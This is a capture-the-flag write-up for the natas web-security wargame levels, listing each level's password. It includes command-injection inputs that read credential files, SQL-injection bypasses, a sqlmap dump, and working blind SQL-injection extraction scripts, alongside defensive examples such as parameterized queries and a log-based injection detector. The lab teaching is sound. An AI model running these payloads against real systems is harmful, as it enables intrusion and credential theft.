natas1-19
This article was last updated 87 days ago; the information in it may be out of date. If you find an error, please e-mail big_fw@foxmail.com

HTTP authentication

  • Basic Authentication: defined in detail in RFC 7617. The client combines the username and password as username:password, Base64-encodes that string, and sends it to the server in the Authorization request header as Basic <encoded string>.
  • Digest Authentication: specified in RFC 7616. It uses a hash algorithm so the password is never sent in cleartext, completing authentication through a challenge-response exchange between server and client.
  • NTLM authentication: not part of the HTTP standard, but widely used in Windows network environments, with its own workflow and message format.
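
As an added example (not part of the original writeup), the Basic scheme from the first bullet in Python: building the header the way the scripts further down hard-code it, parsing it on the server side, and comparing the password in constant time. The function names are this example's own; the credentials used in the usage block are the natas15 values that appear later on this page. Basic auth only encodes the password, so the header must only ever travel over TLS.

```python
import base64
import binascii
import hmac


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization value for HTTP Basic auth (RFC 7617).

    Base64 is an encoding, not encryption: anyone who observes this header
    recovers the password, which is why Basic auth is only acceptable over TLS.
    """
    if ":" in username:
        # RFC 7617: the user-id must not contain a colon, otherwise the
        # receiver cannot tell where the username ends.
        raise ValueError("username must not contain ':'")
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def parse_basic_auth(header: str):
    """Server side: return (username, password) or None for anything malformed.

    Failing closed on a wrong scheme, bad Base64 or a missing colon means
    attacker-controlled header values never raise inside the request handler.
    """
    parts = header.split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        raw = base64.b64decode(parts[1].strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if ":" not in raw:
        return None
    username, password = raw.split(":", 1)  # the password itself may contain ':'
    return username, password


def check_credentials(header: str, expected_user: str, expected_password: str) -> bool:
    """Compare the submitted password in constant time to avoid a timing side channel."""
    parsed = parse_basic_auth(header)
    if parsed is None:
        return False
    username, password = parsed
    return username == expected_user and hmac.compare_digest(
        password.encode("utf-8"), expected_password.encode("utf-8"))


if __name__ == "__main__":
    # The natas15 credentials that appear later in this writeup
    h = basic_auth_header("natas15", "SdqIqBsFcz3yotlNYErZSZwblkm0lrvx")
    print(h)                    # Basic bmF0YXMxNTpTZHFJcUJzRmN6M3lvdGxOWUVyWlNad2Jsa20wbHJ2eA==
    print(parse_basic_auth(h))  # ('natas15', 'SdqIqBsFcz3yotlNYErZSZwblkm0lrvx')
```

Decoding the Authorization header that the natas15 script below hard-codes gives exactly the username and password line from that level, which is the whole point: the header is reversible by anyone who can read the request.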

curl

```shell
curl -i http://natas17.natas.labs.overthewire.org/index.php --basic -u natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC
```

sqlmap

```shell
sqlmap -u http://natas17.natas.labs.overthewire.org/index.php --auth-type=basic --auth-cred=natas17:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC --dbms=mysql --data username=natas18 --level=5 --risk=3 --technique=T --dump --batch
```

natas0-1 :

View the page source
0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq

natas1-2 :

F12, inspect element
TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI

natas2-3:

Open user.txt in the files folder
3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH

natas3-4:

robots.txt file

QryZXc2e0zahULdHrtHxzyYkj59kUxLQ

natas4-5:

Add a request header

modheader
Referer http://natas5.natas.labs.overthewire.org/

0n35PkggAPm2zbEpOU802c0x0Msn1ToK

natas5-6:

Change the authentication parameter in the cookie to 1

Cookie: _ga=GA1.1.1201777083.1737336658; _ga_RD0K2239G0=GS1.1.1737336657.1.1.1737338614.0.0.0; loggedin=1

0RoJwHdSKWFTYR5WuiAewauSuNaBXned

natas6-7:

Open the file includes/secret.inc

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
includes/secret.inc "; } else { print "Wrong secret"; } } ?>
```

bmg8SvU1LizuWjx3y7xkNERkHxGre0GS

natas7-8:

File inclusion

hint: password for webuser natas8 is in /etc/natas_webpass/natas8

xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q

natas8-9:

Decode by reversing what the code does: From Hex, then Reverse, then From Base64.

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
"; } else { print "Wrong secret"; } } ?>
```

ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

$apr1$p5hxEdIi$jDg7hmdch008hyW9lyEIr0:
ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t

natas9-10:

Command injection

a ; find / -user natas9 2>/dev/null
.
./.htaccess
./dictionary.txt
./index.php
./.htpasswd

Read /etc/natas_webpass/natas10

t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu

/etc/natas_webpass/natas11


natas10-11:

Command injection is restricted here; use grep's own arguments to make it read the file

.* /etc/natas_webpass/natas11 #
UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk
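
Added example, not from the writeup, covering natas9 and natas10: why the "; find" and "$( )" inputs above change the command, and how the same lookup is done safely. The level pastes the needle into a string that a shell parses; passing it as one argv element with no shell leaves it as plain data, and an allowlist rejects it up front. The function names are this example's own, and a Python child process stands in for grep so the block runs without grep installed.

```python
import json
import re
import subprocess
import sys

# A dictionary lookup only needs letters, so that is all the allowlist accepts.
NEEDLE_ALLOWED = re.compile(r"[A-Za-z]+")


def build_shell_command(needle: str) -> str:
    """The level's shape: the needle is pasted into a string that a shell parses.
    Metacharacters in the needle (; | & and $( )) therefore become shell syntax."""
    return f"grep -i {needle} dictionary.txt"


def is_allowed_needle(needle: str) -> bool:
    """Allowlist check: reject anything a dictionary lookup does not need."""
    return NEEDLE_ALLOWED.fullmatch(needle) is not None


def argv_as_received(needle: str) -> list:
    """Run a child with an argv list and no shell, and return the argv the child saw.

    A Python child is used as the program so the example runs without grep;
    for the real lookup the list would be ["grep", "-i", "--", needle, "dictionary.txt"].
    The needle arrives as exactly one element, whatever characters it contains.
    """
    child = [sys.executable, "-c",
             "import sys, json; print(json.dumps(sys.argv[1:]))",
             "-i", "--", needle, "dictionary.txt"]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return json.loads(result.stdout)


if __name__ == "__main__":
    injected = "a ; find / -user natas9 2>/dev/null"   # the natas9 input from above
    print(build_shell_command(injected))   # a shell would run two commands here
    print(is_allowed_needle(injected))     # False
    print(argv_as_received(injected))      # ['-i', '--', 'a ; find / -user natas9 2>/dev/null', 'dictionary.txt']
```

The "--" before the needle matters too: without it a needle beginning with "-" would be read by grep as an option.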

natas11-12:

Per the code, the cookie value is loaded into the array that holds showpassword.

The value is built with an XOR operation, which can be inverted to recover the key from the current cookie and the plaintext hard-coded in the code.

yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

document.cookie="data="

The cookie value is built as JSON -> xor -> base64:
{"showpassword":"yes","bgcolor":"#ffffff"}

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
"no", "bgcolor"=>"#ffffff"); function xor_encrypt($in) { $key = ''; $text = $in; $outText = ''; // Iterate through each character for($i=0;$i
```
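
Added example (mine, not the level's PHP): the key recovery the paragraph above describes, in Python, with a constructed 4-byte key "k3y!" standing in for the level's real key, followed by the fix: a cookie that carries an HMAC tag over its payload, so a modified payload is rejected instead of decoded. Function names and the server secret are constructed for this example.

```python
import base64
import hashlib
import hmac
import json
from itertools import cycle

# Constructed stand-ins: the level's real key and a server secret are not on this page.
DEMO_KEY = b"k3y!"
SERVER_SECRET = b"constructed-server-secret-change-me"


def encode_settings(settings: dict) -> bytes:
    """JSON without whitespace, the same text PHP's json_encode() produces."""
    return json.dumps(settings, separators=(",", ":")).encode()


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR like the level's xor_encrypt(); applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def make_cookie(settings: dict, key: bytes) -> str:
    """base64(xor(json)), which is how the 'data' cookie is built."""
    return base64.b64encode(xor_encrypt(encode_settings(settings), key)).decode()


def recover_key_stream(cookie: str, known_plaintext: bytes) -> bytes:
    """XOR is its own inverse: ciphertext XOR known plaintext yields the key stream
    at every position where the plaintext is known (here: the default settings)."""
    return xor_encrypt(base64.b64decode(cookie), known_plaintext)


def shortest_period(stream: bytes) -> bytes:
    """Collapse a repeating key stream to the key itself."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


# The fix: keep the payload readable but bind it to a keyed MAC, so any change to the
# payload (including flipping showpassword) fails verification before it is parsed.
def make_signed_cookie(settings: dict, secret: bytes) -> str:
    payload = base64.b64encode(encode_settings(settings)).decode()
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def load_signed_cookie(cookie: str, secret: bytes):
    """Return the settings dict, or None if the tag does not match the payload."""
    payload, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(payload))


if __name__ == "__main__":
    default = {"showpassword": "no", "bgcolor": "#ffffff"}
    cookie = make_cookie(default, DEMO_KEY)
    print(shortest_period(recover_key_stream(cookie, encode_settings(default))))  # b'k3y!'
    signed = make_signed_cookie(default, SERVER_SECRET)
    print(load_signed_cookie(signed, SERVER_SECRET))  # the settings come back unchanged
```

The XOR scheme fails for two independent reasons: a single known plaintext/ciphertext pair reveals the whole key, and nothing ties the ciphertext to the server, so a re-encrypted payload is accepted as genuine. The signed variant fixes the second problem, which is the one that matters for a settings cookie; a server that must also hide the contents would encrypt and then MAC.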

natas12-13:

The backend does not validate the filename; file upload
trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

cat /etc/natas_webpass/natas13


natas13-14:

Image validation was added; put the GIF magic bytes at the start of the file in the request
z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
1000) {
    echo "File is too big";
} else {
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo "The file $target_path has been uploaded";
    } else{
        echo "There was an error uploading the file, please try again!";
    }
}
} else { ?>
```

cat /etc/natas_webpass/natas14
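
Added example covering natas12 and natas13 (not from the writeup): a magic-byte check by itself accepts any file that starts with GIF89a and continues with whatever text follows, so what decides whether an upload is dangerous is the name and extension the server stores it under. level_check approximates the level's gate; hardened_check is this example's own: a size cap, the magic bytes, an allowlisted extension, and a server-chosen random filename. The sample bytes are constructed.

```python
import os
import secrets

# Constructed sample files
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16
POLYGLOT = b"GIF89a" + b"<?php echo 'constructed'; ?>"   # valid magic bytes, then text

MAX_SIZE = 1000                  # the level's own size limit
ALLOWED_EXTENSIONS = {".gif"}    # this example's allowlist; it matches the content check below


def looks_like_gif(data: bytes) -> bool:
    """Magic-byte check only. Anything may follow the six header bytes."""
    return data.startswith((b"GIF89a", b"GIF87a"))


def level_check(filename: str, data: bytes) -> bool:
    """Approximates the level's gate: size cap plus magic bytes, and the file keeps
    the name (and therefore the extension) the client chose."""
    return len(data) <= MAX_SIZE and looks_like_gif(data)


def hardened_check(filename: str, data: bytes):
    """Return the name the server will store the file under, or None to reject.

    How the web server later treats the stored file is decided by its extension,
    so the extension is allowlisted and the stored name is chosen by the server,
    never taken from the request.
    """
    if len(data) > MAX_SIZE or not looks_like_gif(data):
        return None
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(8) + ".gif"   # random basename, fixed non-executable extension


if __name__ == "__main__":
    print(level_check("shell.php", POLYGLOT))       # True: the magic bytes satisfy the level
    print(hardened_check("shell.php", POLYGLOT))    # None: .php is not an allowed extension
    print(hardened_check("pic.gif", REAL_GIF))      # a random 16-hex-character name ending in .gif
```

Storing uploads outside the document root and serving them through a handler that sets the Content-Type removes the remaining reliance on the extension; re-encoding the image with an image library would additionally strip any trailing text.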

natas14-15:

SQL injection: build an or 1=1 condition that is always true, so the page returns the password.

Add the ?debug parameter to see the contents of $query.
username=admin&password=admin" or 1=1 -- -
SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
'); mysqli_select_db($link, 'natas14');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query";
}
if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
    echo "Successful login! The password for natas15 is ";
} else {
    echo "Access denied!";
}
mysqli_close($link);
} else { ?>
```

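Added example (not the level's code): the string-concatenated query from this level rebuilt in Python against an in-memory SQLite table with constructed rows, beside the parameterized version. SQLite string literals use single quotes, so the always-true input here is admin' or 1=1 -- - rather than the double-quoted MySQL form used above.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the level's users table; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("natas15", "constructed-password-1"),
                      ("alice", "constructed-password-2")])
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Same construction as the level's PHP: request values spliced into the SQL text."""
    return f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"


def login_vulnerable(conn, username: str, password: str) -> int:
    """Rows returned by the concatenated query; the level prints 'Successful login' if > 0."""
    return len(conn.execute(build_vulnerable_query(username, password)).fetchall())


def login_parameterized(conn, username: str, password: str) -> int:
    """Same check with bound parameters: the driver sends the values separately from the
    SQL, so quotes, OR and comment markers in the input stay inside the string value."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchall()
    return len(rows)


if __name__ == "__main__":
    conn = setup_db()
    bypass = "admin' or 1=1 -- -"      # the writeup's input, with SQLite's quote character
    print(build_vulnerable_query("admin", bypass))
    print(login_vulnerable(conn, "admin", bypass))      # 2: every row matches
    print(login_parameterized(conn, "admin", bypass))   # 0
```

The debug output in the fragment above is the second defect: echoing the assembled query to the client turns every error into a free oracle for the attacker. The table also stores passwords in cleartext, so even a correct query leaks them on compromise; a real login would compare a password hash.
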
natas15-16

Boolean-based blind injection

a " and ascii(substr(password,1,1))=ascii('h') -- -

" OR ascii(substr(password,1,1)) = ascii('h') -- - ');

Whether "This user exists." appears is the true/false signal.

Fragment of the level's PHP source (the beginning was lost when the page was extracted):
```php
mysqli_select_db($link, 'natas15');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
    echo "Executing query: $query";
}
$res = mysqli_query($link, $query);
if($res) {
    if(mysqli_num_rows($res) > 0) {
        echo "This user exists.";
    } else {
        echo "This user doesn't exist.";
    }
} else {
    echo "Error in query.";
}
mysqli_close($link);
} else { ?>
```
```python
import requests

url = "http://natas15.natas.labs.overthewire.org/index.php"
uu = ""  # characters recovered so far
head = {"Authorization": "Basic bmF0YXMxNTpTZHFJcUJzRmN6M3lvdGxOWUVyWlNad2Jsa20wbHJ2eA==",
        'Content-Type': 'application/x-www-form-urlencoded'}
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for i in range(1, 33):          # the password is 32 characters long
    for x in s:
        # ascii() compares numbers, so the test is case-sensitive
        p = f"username=natas16\" and ascii(substr(password,{i},1)) = ascii('{x}') -- -"
        re = requests.post(url=url, data=p, headers=head)
        print("." * i)
        if "This user exists." in re.text:   # the true/false oracle
            uu += x
            print("[+]:", uu)
            break
print(uu)
```

natas16-17:

Command injection and grep are restricted further; use what (grep ^x /etc/natas_webpass/natas17) returns to tell whether the file contains x.

grep -i \"$key\" dictionary.txt

grep -i \"African$(grep ^a /etc/natas_webpass/natas17) \" dictionary.txt

When $() produces no output, the whole command searches for African and returns it; that gives the true/false signal for the boolean-based blind extraction.
EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC

```python
import requests

url = "http://natas16.natas.labs.overthewire.org/index.php"
uu = "EqjHJbo7LFNb8vwhHb9s75hokh5TF0O"   # prefix recovered in an earlier run; set to "" to start over
head = {"Authorization": "Basic bmF0YXMxNjpoUGtqS1l2aUxRY3RFVzMzUW11WEw2ZURWZk1XNHNHbw==",
        'Content-Type': 'application/x-www-form-urlencoded'}
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for i in range(1, 33):
    for x in s:
        dd = uu + x
        # if grep matches, $() expands to the password and "African..." is no longer in the dictionary
        t = f"African$(grep ^{dd} /etc/natas_webpass/natas17)"
        p = {"needle": t}
        print("*" * i)
        re = requests.get(url=url, params=p, headers=head)
        if "African" not in re.text:
            uu += x
            print("[+]", uu)
            break
print(uu)
```

natas17-18

Time-based blind injection

Enumerate the value of password with a LIKE BINARY clause, using the response time as the signal.

SELECT * from users where username="natas17 or 1=1 -- -"

natas17" and sleep(10) -- -

natas17" and if((ascii(substr(password,1,1)) =ascii('U')), sleep(10), 3) -- -

Timing check (the fragment as written, completed so that it runs; the request itself is left out):
```python
import time

start_time = time.time()
# send the request here
use_time = time.time() - start_time
if use_time > 5:
    pass  # the injected condition was true: sleep(10) ran
```

natas18" and password like binary "%a%" and sleep(5) -- -

bKdVjyBlpxgD4DDbRG6ZLlCGgCJ

6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ

```python
import requests
import string
import time

# equivalently: s = string.ascii_letters + string.digits
s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
url = "http://natas17.natas.labs.overthewire.org/index.php"
f = ""   # characters that occur anywhere in the password
head = {"Authorization": "Basic bmF0YXMxNzpFcWpISmJvN0xGTmI4dndoSGI5czc1aG9raDVURjBPQw==",
        "Content-Type": "application/x-www-form-urlencoded"}

# Pass 1: which characters appear at all (LIKE BINARY keeps the comparison case-sensitive)
for i in s:
    p = f"username=natas18\" and password like binary \"%{i}%\" and sleep(2) -- -"
    re = requests.post(url=url, data=p, headers=head)
    print(re.status_code, re.elapsed.seconds)
    if re.elapsed.seconds >= 2:   # the sleep ran, so the condition was true
        f += i
print(f)

# Pass 2: extend the known prefix one character at a time
uu = ""
for i in range(1, 33):
    for x in s:
        dd = uu + x
        p = f"username=natas18\" and password like binary \"{dd}%\" and sleep(2) -- -"
        re = requests.post(url=url, data=p, headers=head)
        print(re.status_code, re.elapsed.seconds)
        if re.elapsed.seconds >= 2:
            uu += x
            print(uu)
            break
    # time.sleep(1)
print(uu)
```
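
Added example serving both the natas15 boolean-based script and the natas17 time-based script from the detection side (not from the writeup): a small analyser over constructed application-log lines that record the decoded request parameters and the response time. It flags the payload shapes used in this writeup (ascii(substr(, or 1=1, sleep(), groups hits by client, and counts requests slow enough to indicate that an injected sleep() actually executed. The log format, addresses and thresholds are constructed.

```python
import re
from collections import Counter, defaultdict

# Constructed application-log lines: timestamp, client, status, response time and the
# decoded request parameters. The lab's forms send them in the POST body, so a plain
# access log would not show them; this is the kind of line an application log or WAF writes.
SAMPLE_LOG = """\
2025-01-20T10:00:01Z 203.0.113.5 200 12ms username=natas16
2025-01-20T10:00:02Z 203.0.113.5 200 11ms username=natas16" and ascii(substr(password,1,1)) = ascii('a') -- -
2025-01-20T10:00:02Z 203.0.113.5 200 10ms username=natas16" and ascii(substr(password,1,1)) = ascii('b') -- -
2025-01-20T10:00:03Z 203.0.113.5 200 12ms username=natas16" and ascii(substr(password,1,1)) = ascii('c') -- -
2025-01-20T10:00:09Z 198.51.100.7 200 2004ms username=natas18" and password like binary "%a%" and sleep(2) -- -
2025-01-20T10:00:12Z 198.51.100.7 200 2003ms username=natas18" and password like binary "a%" and sleep(2) -- -
2025-01-20T10:00:15Z 192.0.2.9 200 9ms username=alice
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<status>\d{3}) (?P<ms>\d+)ms (?P<params>.*)$")

# Payload shapes taken from this writeup; matched case-insensitively on the decoded parameters.
TIME_MARKERS = (r"\bsleep\s*\(",)
BOOLEAN_MARKERS = (r"ascii\s*\(\s*substr\s*\(",)
TAUTOLOGY_MARKERS = (r"\bor\s+1\s*=\s*1\b",)


def parse_line(line: str):
    """Split one log line into fields, or return None for a line in another format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ms"] = int(rec["ms"])
    return rec


def classify(params: str):
    """'time-based', 'boolean-based', 'tautology', or None when no marker is present."""
    p = params.lower()
    if any(re.search(pat, p) for pat in TIME_MARKERS):
        return "time-based"
    if any(re.search(pat, p) for pat in BOOLEAN_MARKERS):
        return "boolean-based"
    if any(re.search(pat, p) for pat in TAUTOLOGY_MARKERS):
        return "tautology"
    return None


def analyze(log_text: str, slow_ms: int = 1500) -> dict:
    """Group flagged requests by client.

    Returns {client: {"count": n, "kinds": {kind: n}, "slow": n}}, where 'slow' counts
    flagged requests whose response time is consistent with the injected sleep() having
    run. A run of boolean probes from one client is the other signature worth alerting on.
    """
    findings = defaultdict(lambda: {"count": 0, "kinds": Counter(), "slow": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["params"])
        if kind is None:
            continue
        f = findings[rec["client"]]
        f["count"] += 1
        f["kinds"][kind] += 1
        if rec["ms"] >= slow_ms:
            f["slow"] += 1
    return {client: dict(f) for client, f in findings.items()}


if __name__ == "__main__":
    for client, f in analyze(SAMPLE_LOG).items():
        print(client, f["count"], dict(f["kinds"]), "slow:", f["slow"])
```

Signature matching catches the scripts exactly as written above and nothing more; the per-client volume and the response-time skew are the more durable signals, since a blind extraction needs hundreds of near-identical requests whatever the payload looks like. Parameterized queries, as in the natas14 example, remove the underlying defect rather than the symptom.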

natas18-19:
tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Username: natas19
Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

Username: natas20
Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

```shell
echo 123-admin | xxd -d | tr -d ' ' | cut -d ":" -f 2 | grep -oP "[0-9a-z]{2,}(?=0a)"
```

Username: natas21
Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH
